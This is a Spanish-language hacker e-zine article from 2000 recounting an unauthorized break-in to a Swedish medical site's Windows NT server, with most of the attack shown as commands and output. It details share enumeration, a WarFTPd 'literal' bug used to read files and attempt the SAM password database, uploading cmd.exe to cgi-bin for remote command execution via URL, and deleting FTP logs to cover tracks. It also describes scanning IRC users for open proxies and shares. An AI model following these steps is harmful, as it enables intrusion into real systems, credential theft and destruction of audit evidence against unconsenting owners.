RareGaZz nº17:(r17_07):30/11/2000 << Back To RareGaZz nº 17
+------+-------------------------------------------+----------+--------------+ | +-->| NT world, BGates world, Kaos world |<---------| GuyBrush | +->|<--> r17_07 <-+-----------+-----+--------->+--------------+----------->|-+ +-------------------------------------------------------------------------- Objetivo ^^^^^^^^ Un servidor elegido al azar ... en este caso uno sueco con una web sobre medicina. Se trata de una peque~a red de 6 equipos (todos con NT) pero como todos tienen fallos similares, me limitare a comentar la entrada de uno de ellos solamente. Objetivos ^^^^^^^^^ Esta claro ... aprender :) Introduccion ^^^^^^^^^^^^ Todo el mundo sabe que los Sistemas Operativos de Bill Gates son pesimos en todos los sentidos (estabilidad, seguridad, etc) pero aun asi los hay que se arriesgan a usarlos en una red a la que cualquiera puede acceder ... Los administradores de NT tienen suerte de que la mayoria de hackers se centren en maquinas tipo Unix pero desgraciadamente para ellos cada dia el NT-hacking se pone mas de moda. Y es esa moda la que ha hecho que me pique la curiosidad y me adentre un poco en el NT-world. Y que mejor forma de aprender que intentando hackear uno :) NOTA: aunque este texto este escrito en primera persona, no realice yo todo el trabajo. Digamos que hice un 50% del mismo ... el otro 50% lo realizo mi buena amiga DustyGirl (por cierto, me obliga a decir que NO es una hacker ... tan solo algo curiosa :) Primeros pasos ^^^^^^^^^^^^^^ Me instale Windows NT, dado que la mayoria de herramientas para hackear NTs solo funcionan bajo este sistema. Recopile algunas utilidades de la red, me lei algunos docs y me puse manos a la obra ... Primero, para entrar en calor mejor buscar algun pobre usuario de Windows, que siempre sabra menos que un administrador (o se supone que deberia saber menos) asi que me adentre en el oscuro mundo del IRC en busca de algun conejillo de indias... /join #sexo ... por aqui hay mucha pe~a :) Herramientas --> Escanear puertos abiertos en el canal Buscar --> Puerto 1080 Que barbaro!!!! cuanta gente usa WinGate!!! bueno, si usan un proxy sera porque tienen una red y, si tienen una red, sera porque comparten algun recurso ... no voy a poner aqui los resultados de mis pruebas porque ya incluire el log del otro hack el cual realice de forma similar. Solo dire que los resultados fueron sorprendentes. No os podeis imaginar la gran cantidad de gente que comparte recursos sin usar ninguna contrase~a o usando los pass por defecto. Incluso a mi buena amiga DustyGirl se le olvido ponerle pass a su impresora y gastandole una bromilla le envie un peque~o texto :) Bien, pero antes de pasar a hackear el servidor quise hacer una ultima prueba: /join #un_canal_de_hackers Herramientas --> Escanear puertos abiertos en el canal Buscar --> Puerto 1080 Vaya!!! los hackers tambien usan windows ... y WinGate ... pero seguro que ellos no tienen recursos compartidos ... bueno, pero seguro que esos recursos no tienen las claves por defecto ... ejem ... pasemos al hack del server :) Manos a la obra ^^^^^^^^^^^^^^^ El servidor que escogimos no fue del todo al azar. La verdad es que bromeando con ^Shadown^, el cual me sorprende su gran habilidad por ocultar su IP en la red, quise chequear la seguridad de su NT y despues de realizar algunos chequeos me di cuenta de que me habia confundido de 'victima'. Este server era uno sueco cuyo contenido web era sobre temas de medicinas o algo asi. Y ya que comenzamos con ese server, quisimos seguir con el hasta el final ... digamos que le cogimos cari~o y decidimos hacer un estudio gratuito sobre la seguridad de su red :) Descripcion del ataque ^^^^^^^^^^^^^^^^^^^^^^ C:\> NBTSTAT -A XXX.15.YYY.89 No se ha encontrado el host. Ups ... parece que no siempre es tan sencillo como pone en algunos docs de hacking ... C:\> NAT XXX.15.YYY.89 ---------------------8<------------------------------------------------------ [*]--- Checking host: XXX.15.YYY.89 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Fri Feb 11 15:58:56 2000 [*]--- Timezone is UTC+1.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Obtained server information: Server=[SMIDIALOG] User=[] Workgroup=[SMINET] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin Backup Disk: C$ Disk: Default share D$ Disk: Default share DBDump Disk: F Disk: IPC$ IPC: Remote IPC MedINT Disk: MSQUERY Disk: Office97 Disk: Slask Disk: SLDatabaser Disk: wwwroot Disk: [*]--- This machine has a browse list: Server Comment --------- ------- DOC SMIBDC SMIDIALOG SMIMAIL [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\Backup [*]--- WARNING: Able to access share: \\*SMBSERVER\Backup [*]--- Checking write access in: \\*SMBSERVER\Backup [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Backup [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\DBDump [*]--- WARNING: Able to access share: \\*SMBSERVER\DBDump [*]--- Checking write access in: \\*SMBSERVER\DBDump [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\DBDump [*]--- Attempting to access share: \\*SMBSERVER\F [*]--- WARNING: Able to access share: \\*SMBSERVER\F [*]--- Checking write access in: \\*SMBSERVER\F [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\F [*]--- Attempting to access share: \\*SMBSERVER\MedINT [*]--- WARNING: Able to access share: \\*SMBSERVER\MedINT [*]--- Checking write access in: \\*SMBSERVER\MedINT [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\MedINT [*]--- Attempting to access share: \\*SMBSERVER\MSQUERY [*]--- WARNING: Able to access share: \\*SMBSERVER\MSQUERY [*]--- Checking write access in: \\*SMBSERVER\MSQUERY [*]--- WARNING: Directory is writeable: \\*SMBSERVER\MSQUERY [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\MSQUERY [*]--- Attempting to access share: \\*SMBSERVER\Office97 [*]--- WARNING: Able to access share: \\*SMBSERVER\Office97 [*]--- Checking write access in: \\*SMBSERVER\Office97 [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Office97 [*]--- Attempting to access share: \\*SMBSERVER\Slask [*]--- WARNING: Able to access share: \\*SMBSERVER\Slask [*]--- Checking write access in: \\*SMBSERVER\Slask [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Slask [*]--- Attempting to access share: \\*SMBSERVER\SLDatabaser [*]--- WARNING: Able to access share: \\*SMBSERVER\SLDatabaser [*]--- Checking write access in: \\*SMBSERVER\SLDatabaser [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\SLDatabaser [*]--- Attempting to access share: \\*SMBSERVER\wwwroot [*]--- WARNING: Able to access share: \\*SMBSERVER\wwwroot [*]--- Checking write access in: \\*SMBSERVER\wwwroot [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\wwwroot [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access ---------------------8<------------------------------------------------------ Vaya!! cuanta info ... vamos a conectarnos para verificar todo lo que nos dice el NAT ... a~ado la IP con el nombre del equipo en mi fichero hosts y ... Inicio->Buscar->Equipo->XXX.15.YYY.89 y me sale: XXX.15.YYY.89 SMINET Ahora pincho sobre el server y me sale en la ventana: Backup DBDump f MedINT Msquery Office97 Slask SLDatabaser wwwroot Impresoras Intento entrar ... Backup y ... 'se ha denegado el acceso' DBDump ... 'se ha denegado el acceso' y asi con todos menos Msquery que si que me dejo ver su contenido ... bueno, para empezar no esta mal :PP Tambien pude entrar en el de Impresoras pero no habia nada. Vamos a echar un vistazo a sus puertos a ver que servicios usa ... Escaneando XXX.15.YYY.89 ... ftp on port 21 web on port 80 Parece que este es un servidor web que tiene el ftp para poder actualizar las paginas remotamente. Me conecto a su pagina y no entiendo una mierda porque esta todo en aleman asi que paso a chequear que soft usan en estos puertos ... telnet XXX.15.YYY.89 21 220-smidialog Server WarFTPd 1.70.b01.04 (Aug 18 1998) Ready (C)opyright 1996 - 1998 by Jarle (jgaa) Aase - all rights reserved. 220 Please enter your user name. telnet XXX.15.YYY.89 80 GET HTTP/1.0 HTTP/1.1 400 Bad Request Server: Microsoft-IIS/4.0 Date: Sun, 13 Feb 2000 17:54:19 GMT Content-Type: text/html Content-Length: 87 vaya vaya ... creo que este admin no esta muy puesto en seguridad. Esa version del War-Ftp (la 1.70) tiene un enorme fallo de seguridad en sus macros que permite acceso remoto a cualquier parte del server. Me documento un poco en packetstorm y voila!! parece que mediante el comando 'literal' se puede editar cualquier fichero del server asi que me instalo el susodicho programa para probarlo primero en mi computer y tras hacer algunos experimentos decido echar un ojo al servidor ... ---------------------8<------------------------------------------------------ C:\> ftp XXX.15.YYY.89 Connected to XXX.15.YYY.89. 220-smidialog Server WarFTPd 1.70.b01.04 (Aug 18 1998) Ready (C)opyright 1996 - 1998 by Jarle (jgaa) Aase - all rights reserved. 220 Please enter your user name. User (XXX.15.YYY.89:(none)): anonymous 331 User name okay. Give your full Email address as password. Password: guest 230 User logged in. ftp> literal [$osname] 500 'WIN32 (NT 4.0 1381 Pentium 1-CPU)': command not understood. ftp> literal [c:\winnt\repair\sam._] 500 'MSCFµ£s╡': command not understood. ftp> bye 221 Goodbye. Control connection closed. ---------------------8<------------------------------------------------------ Estuve dotoreando un poco en el servidor pero no consegui ningun texto interesante dado que es un ataque un poco 'a ciegas' y como es algo aburrido, lo deje estar. Intente editar el fichero 'sam._' pero tal y como decia la descripcion del bug, solo se pueden editar ficheros de texto dado que los binarios tienen algunos caracteres que se identifican como final de fichero y solo se puede ver una minima parte ya que se corta la edicion enseguida. Pasemos ahora a examinar el otro servicio ... Microsoft-IIS/4.0 ... jeje este tambien tiene algunos problemillas de seguridad bastante graves. Segun pone en unos textos que lei, es posible administrar remotamente el servidor web usando el explorador de frontpage. Vamos a ver si esto es cierto ... abro mi frontpage e intento administrarlo remotamente ... [archivo->abrir web de frontpage->XXX.15.YYY.89] ... voila!! parece que tengo acceso a su web :) Navego un poco y me bajo algunas cosillas desde el explorador del FP. Jeje vaya pagina mas descuidada ... bueno, vamos a hacer algo creativo. En lugar de bajarme cosas vamos a subirlas. Parece que tiene un directorio cgi-bin con un par de programas. Esto quiere decir que soporta cgis asi que subire a ese directorio el cmd.exe (en NT, equivalente al command.com del DOS) y asi podre acceder desde mi navegador ejecutando remotamente comandos (de forma similar a como se hace con el tan famoso bug del phf del que tanto se ha hablado) ... Subo el binario al cgi-bin y vuelvo al navegador a probar algunas cosas ... http://XXX.15.YYY.89/cgi-bin/cmd.exe?/c%20dir%20c:\ ---------------------8<------------------------------------------------------ Directorio de c:\ 99-04-28 13:26 0 AUTOEXEC.BAT 99-05-10 15:54 <DIR> CDCREATR 99-04-28 13:26 0 CONFIG.SYS 00-02-11 15:01 52 964 msquery 99-05-06 18:14 <DIR> MSSQL 99-09-28 12:49 <DIR> Program Files 99-05-11 08:12 <DIR> sqlany50 00-02-11 13:44 <DIR> TEMP 00-01-19 10:51 <DIR> WINNT 9 archivos 52 964 bytes 661 595 136 bytes libres ---------------------8<------------------------------------------------------ Jeje esto se pone interesante ... no hace falta decir que el %20 equivale al codigo ASCII del espacio ... y echando un ojo a su sistema me sale todo esto: ---------------------8<------------------------------------------------------ Directorio de c:\WINNT 00-01-19 10:51 <DIR> . 00-01-19 10:51 <DIR> .. 99-05-17 08:15 179 ACROREAD.INI 99-04-27 15:50 1 319 Active Setup Log.BAK 99-04-27 15:58 12 935 Active Setup Log.txt 99-04-27 15:58 21 749 Bind List Log.txt 96-10-14 02:38 5 328 black16.scr 99-04-27 15:56 <DIR> CatRoot 95-07-20 17:00 189 952 CCARD232.EXE 97-11-17 23:00 84 032 Channel Screen Saver.SCR 96-10-14 02:38 82 944 clock.avi 97-11-06 17:21 44 544 clspack.exe 99-04-28 13:19 <DIR> Config 99-04-28 13:26 0 control.ini 99-04-27 15:56 <DIR> COOKIES 95-11-01 11:27 151 040 CRLLYRNT.DLL 99-04-27 15:56 <DIR> Cursors 99-09-27 07:40 246 035 drwtsn32.log 97-04-30 23:00 234 256 EXPLORER.EXE 97-11-17 23:00 103 424 EXTRAC32.EXE 97-11-17 23:00 52 998 EXTRACT.EXE 99-05-03 16:25 276 frontpg.ini 99-05-18 08:55 <DIR> Help 99-03-02 23:00 26 896 hh.exe 99-04-27 15:56 <DIR> History 99-04-27 15:56 127 391 IE4 Setup Log.Txt 97-11-17 23:00 17 655 IEXTRACT.EXE 99-05-06 18:17 354 INFOVIEW.INI 97-05-29 16:31 314 880 IsUn041d.exe 98-07-30 12:51 305 152 IsUninst.exe 97-11-06 16:23 6 550 jautoexp.dat 99-04-27 15:57 <DIR> Java 99-04-27 15:57 1 334 javainst.log 97-11-06 16:59 44 544 jview.exe 96-10-14 02:38 157 044 lanma256.bmp 96-10-14 02:38 157 044 lanmannt.bmp 99-04-27 11:25 <DIR> Media 99-10-20 09:25 129 mmc.INI 99-05-06 18:14 <DIR> MSAPPS 99-04-27 16:06 16 384 MSIMGSIZ.DAT 95-07-20 17:00 209 228 MSQRY32.CUE 96-10-14 02:38 67 328 network.wri 96-10-14 02:38 45 328 NOTEPAD.EXE 99-09-28 13:30 825 ODBC.INI 95-06-07 03:24 7 168 odbcad32.exe 95-03-03 05:00 6 464 odbcadm.exe 95-06-07 03:25 6 656 odbccp32.cpl 95-03-03 05:00 17 412 odbcinst.hlp 99-09-28 13:30 1 227 ODBCINST.INI 96-10-14 02:38 123 152 poledit.exe 96-10-14 02:38 34 816 printer.wri 99-08-24 10:19 <DIR> Profiles 99-09-13 08:28 106 Reg Save Log.txt 96-10-14 02:38 71 952 REGEDIT.EXE 99-04-27 11:26 <DIR> repair 99-04-27 16:02 19 618 RunOnceEx Log.txt 99-05-03 16:19 <DIR> Samples 99-12-31 12:00 32 657 SchedLog.Txt 97-11-06 17:13 42 496 setdebug.exe 99-09-13 08:28 463 setup.old 99-04-27 11:25 138 setuplog.txt 99-04-27 15:42 154 494 SMIDIALOG.bmp 99-05-18 08:58 379 Soft Boot Log.txt 99-05-11 08:12 0 sqlany.ini 99-04-27 16:02 <DIR> Subscriptions 99-09-28 13:29 <DIR> system 96-10-14 02:38 219 system.ini 00-01-19 10:52 <DIR> system32 96-10-14 02:38 32 016 TASKMAN.EXE 99-04-27 16:02 <DIR> Temporary Internet Files 96-11-06 11:10 301 568 unin041d.exe 98-05-22 01:01 299 008 uninst.exe 99-09-27 07:41 12 132 271 user.dmp 96-10-14 02:38 24 336 vmmreg32.dll 99-04-27 15:57 <DIR> Web 96-10-14 02:38 22 288 welcome.exe 00-02-04 14:19 358 WIN.INI 96-10-14 02:38 3 WINFILE.INI 96-10-14 02:38 256 192 WINHELP.EXE 97-04-30 23:00 311 056 WINHLP32.EXE 96-10-14 02:38 707 _DEFAULT.PIF 99-09-15 10:26 0 ~DF4D8.tmp 99-05-04 12:45 0 ~DFCA20.tmp 99-05-05 09:20 0 ~DFD0BC.tmp 99-08-24 10:15 0 ~DFD65E.tmp 99-08-13 14:41 0 ~DFD7F9.tmp 99-05-18 09:00 0 ~DFD83F.tmp 99-08-24 10:07 0 ~DFD885.tmp 99-09-01 09:43 0 ~DFD8FD.tmp 99-05-23 12:46 0 ~DFD980.tmp 99-09-03 06:53 0 ~DFDA84.tmp 99-09-09 13:09 0 ~DFDA8E.tmp 99-06-03 08:10 0 ~DFDAC0.tmp 99-09-07 13:25 0 ~DFDB06.tmp 99-09-27 07:10 0 ~DFDB24.tmp 99-08-25 08:13 0 ~DFDC1F.tmp 99-05-03 16:29 0 ~DFDCA1.tmp 99-09-20 07:33 0 ~DFDD05.tmp 99-07-21 09:39 0 ~DFDD2D.tmp 99-09-03 08:00 0 ~DFDD37.tmp 99-06-04 10:57 0 ~DFDD87.tmp 99-05-26 11:39 0 ~DFDDD7.tmp 99-05-17 08:20 0 ~DFDFC2.tmp 00-01-19 10:51 0 ~DFE21B.tmp 99-08-24 11:24 0 ~DFE315.tmp 99-09-22 07:40 0 ~DFE3D3.tmp 99-09-27 16:15 0 ~DFE713.tmp 99-09-22 07:02 0 ~DFE73B.tmp 99-12-03 10:33 0 ~DFE781.tmp 99-10-04 08:12 0 ~DFE78B.tmp 99-10-20 09:10 0 ~DFE803.tmp 99-09-28 13:32 0 ~DFE80D.tmp 99-08-31 07:53 0 ~DFE82B.tmp 99-07-19 16:55 0 ~DFE899.tmp 99-09-21 11:59 0 ~DFE91B.tmp 99-05-11 08:17 0 ~DFE92F.tmp 99-09-21 10:24 0 ~DFE943.tmp 99-11-03 11:24 0 ~DFE96B.tmp 99-11-26 11:28 0 ~DFE9BC.tmp 99-10-17 11:04 0 ~DFE9C6.tmp 99-12-10 08:46 0 ~DFE9F8.tmp 99-11-13 11:15 0 ~DFEA2A.tmp 99-09-28 07:36 0 ~DFEA7A.tmp 99-09-28 12:59 0 ~DFEAA2.tmp 99-09-21 15:41 0 ~DFEAE8.tmp 99-09-13 16:31 0 ~DFEB24.tmp 99-08-04 10:17 0 ~DFEB38.tmp 99-09-15 14:13 0 ~DFEB6A.tmp 99-06-02 09:47 0 ~DFEC00.tmp 99-09-23 12:38 0 ~DFEC97.tmp 99-09-13 07:03 0 ~DFECDD.tmp 99-09-10 07:48 0 ~DFECF1.tmp 99-09-24 08:07 0 ~DFED5F.tmp 00-01-03 08:37 0 ~DFEE09.tmp 99-05-25 10:48 0 ~DFEE27.tmp 99-09-11 05:53 0 ~DFFE1D.tmp 136 archivos 16 628 297 bytes 661 595 136 bytes libres Directorio de c:\WINNT\catroot 99-04-27 15:56 <DIR> . 99-04-27 15:56 <DIR> .. 97-11-17 23:00 157 696 ICATALOG.MDB 3 archivos 157 696 bytes 661 595 136 bytes libres ---------------------8<------------------------------------------------------ Esta BD me la baje pero estaba vacia :(( ---------------------8<------------------------------------------------------ Directorio de c:\WINNT\profiles 99-08-24 10:19 <DIR> . 99-08-24 10:19 <DIR> .. 99-09-13 08:28 <DIR> Administrator 99-04-28 13:22 <DIR> All Users 99-04-27 11:26 <DIR> Default User 99-08-24 10:19 <DIR> PerH 99-04-27 16:02 <DIR> SMIAdmin 7 archivos 0 bytes 661 648 384 bytes libres Directorio de c:\WINNT\repair 99-04-27 11:26 <DIR> . 99-04-27 11:26 <DIR> .. 96-10-14 02:38 438 autoexec.nt 99-04-28 13:26 2 510 config.nt 99-04-27 11:26 16 752 default._ 99-04-27 11:26 14 614 ntuser.da_ 99-04-27 11:26 2 889 sam._ 99-04-27 11:26 2 895 security._ 99-04-27 15:53 50 015 setup.log 99-04-27 11:26 121 160 software._ 99-04-27 11:26 70 669 system._ 11 archivos 281 942 bytes 661 648 384 bytes libres ---------------------8<------------------------------------------------------ Estos files no tenian permiso de lectura por lo que no pude bajarlos ... una pena .. ---------------------8<------------------------------------------------------ Directorio de d:\ 99-04-27 12:06 <DIR> I386 99-09-13 08:33 <DIR> Inetpub 00-02-09 11:14 <DIR> MI 99-11-18 11:33 <DIR> Mssql 00-01-19 10:51 279 969 792 pagefile.sys 99-05-03 16:22 <DIR> Program Files 00-02-12 01:04 <DIR> SpeedlineDB 00-02-10 17:27 <DIR> Temp 8 archivos 279 969 792 bytes 23 449 600 bytes libres Directorio de d:\inetpub 99-09-13 08:33 <DIR> . 99-09-13 08:33 <DIR> .. 99-09-03 07:28 248 adresser till LQ formulär.txt 99-05-03 16:23 <DIR> ftproot 99-05-03 16:22 <DIR> iissamples 99-09-02 09:08 13 ipnr.txt 99-05-03 16:22 <DIR> Mail 99-05-03 16:24 <DIR> Mailroot 99-11-02 15:33 <DIR> scripts 00-02-12 21:01 <DIR> wwwroot 10 archivos 261 bytes 23 449 600 bytes libres ---------------------8<------------------------------------------------------ Vaya!! encontre donde esta el servidor web :) ahora podre copiar lo que me interese a d:\inetpub\wwwroot y bajarmelo tranquilamente desde mi navegador. ---------------------8<------------------------------------------------------ Directorio de d:\inetpub\mailroot 99-05-03 16:24 <DIR> . 99-05-03 16:24 <DIR> .. 99-05-03 16:24 <DIR> Badmail 99-05-03 16:24 <DIR> Drop 99-05-03 16:24 <DIR> Mailbox 99-05-03 16:24 <DIR> Pickup 99-05-03 16:24 <DIR> Queue 99-05-03 16:24 <DIR> Route 99-05-03 16:24 <DIR> SortTemp 9 archivos 0 bytes 23 449 600 bytes libres ---------------------8<------------------------------------------------------ Todos estos directorios estaban vacios ... se ve que lo instalaron pero no lo han usado. Y lo mismo pasa con el directorio Mail y el ftproot. ---------------------8<------------------------------------------------------ Directorio de c:\winnt\system32\config 99-04-28 13:22 <DIR> . 99-04-28 13:22 <DIR> .. 00-01-18 02:00 524 288 AppEvent.Evt 00-02-08 23:33 81 920 default 00-02-08 23:33 1 024 default.LOG 99-04-28 13:20 65 536 default.sav 00-02-12 20:46 24 576 SAM 00-02-12 20:46 1 024 SAM.LOG 99-04-27 11:54 65 536 SecEvent.Evt 00-02-08 19:22 49 152 SECURITY 00-02-08 19:22 1 024 SECURITY.LOG 00-02-11 13:45 3 850 240 software 00-02-11 13:45 1 024 software.LOG 99-04-28 13:20 323 584 software.sav 99-12-31 12:00 65 536 SysEvent.Evt 00-02-02 16:23 1 429 504 system 00-02-02 16:23 1 429 504 SYSTEM.ALT 99-04-28 13:20 1 024 system.LOG 99-04-28 13:20 192 512 system.sav 96-10-14 02:38 77 824 userdiff 20 archivos 8 184 832 bytes 661 648 384 bytes libres Directorio de c:\program files 99-09-28 12:49 <DIR> . 99-09-28 12:49 <DIR> .. 99-05-17 08:15 <DIR> Acrobat Reader 99-05-17 08:16 <DIR> CD-Writer Plus 99-04-27 15:56 <DIR> Common Files 99-09-03 13:49 <DIR> McAfee 99-05-03 16:23 <DIR> Microsoft Script Debugger 99-05-03 16:21 <DIR> Mts 99-04-27 11:25 <DIR> Plus! 99-09-28 12:49 <DIR> Sybase 00-01-10 15:33 <DIR> websvar 99-04-27 15:54 <DIR> Windows NT 99-09-07 09:11 <DIR> WinZip 13 archivos 0 bytes 661 648 384 bytes libres Directorio de c:\winnt\system32\logfiles 99-09-07 15:17 <DIR> . 99-09-07 15:17 <DIR> .. 99-06-22 11:38 <DIR> MSFTPSVC1 99-05-16 14:29 <DIR> SMTPSVC1 99-09-09 07:08 <DIR> W3SVC1 99-09-07 15:17 <DIR> W3SVC2 6 archivos 0 bytes 661 647 872 bytes libres Directorio de c:\winnt\system32\logfiles\msftpsvc1 00-02-12 21:39 <DIR> . 00-02-12 21:39 <DIR> .. 00-02-07 02:32 460 ex000205.log 00-02-10 03:07 232 ex000207.log 00-02-12 21:39 232 ex000210.log 00-02-12 21:39 65 536 ex000212.log 99-07-19 16:52 191 ex990622.log 99-08-14 01:16 65 536 ex990814.log 99-10-18 09:52 65 536 ex991018.log 99-11-03 11:23 187 ex991023.log 10 archivos 197 910 bytes 661 647 872 bytes libres ---------------------8<------------------------------------------------------ Ups ... aqui deben estar todos esos accesos que he realizado al sistema ... no me gusta hacer esto pero ... creo que los borrare :) Bien, creo que ya me he divertido bastante. Borro el cmd.exe del server y me desconecto. Como veis, sin necesidad de usar ningun tipo de programa (el NAT lo use pero no me sirvio para entrar dado que el server no requeria contrase~a alguna; y el escaneador de puertos tampoco era necesario para chequear los puertos FTP y WEB) pude entrar e incluso podia haber modificado su pagina web o hacerles cualquier cosa (como subir un sniffer, un keylogger, o incluso borrarles el disco duro) ya que tenia control absoluto de la maquina ... suerte que ese no es mi estilo y en su lugar envie un mail al admin advirtiendole de sus enormes fallos de seguridad. Esto demuestra que los servidores NT son muy vulnerables. Si te arriesgas a usar NT para administrar tus maquinas asegurate de poner buenos pass, estar al dia en cuanto a los fallos de seguridad, actualizar los Service Pack (este server tenia solo hasta el 3) y sobre todo no olvides poner un buen firewall. Agradecimientos ^^^^^^^^^^^^^^^ A DustyGirl naturalmente ya que el hack fue realizado por ambos y como no a mi amigo y compa~ero de Team, ^Shadown^ por su gran apoyo en mi adentramiento en el mundo de Bill Gates :)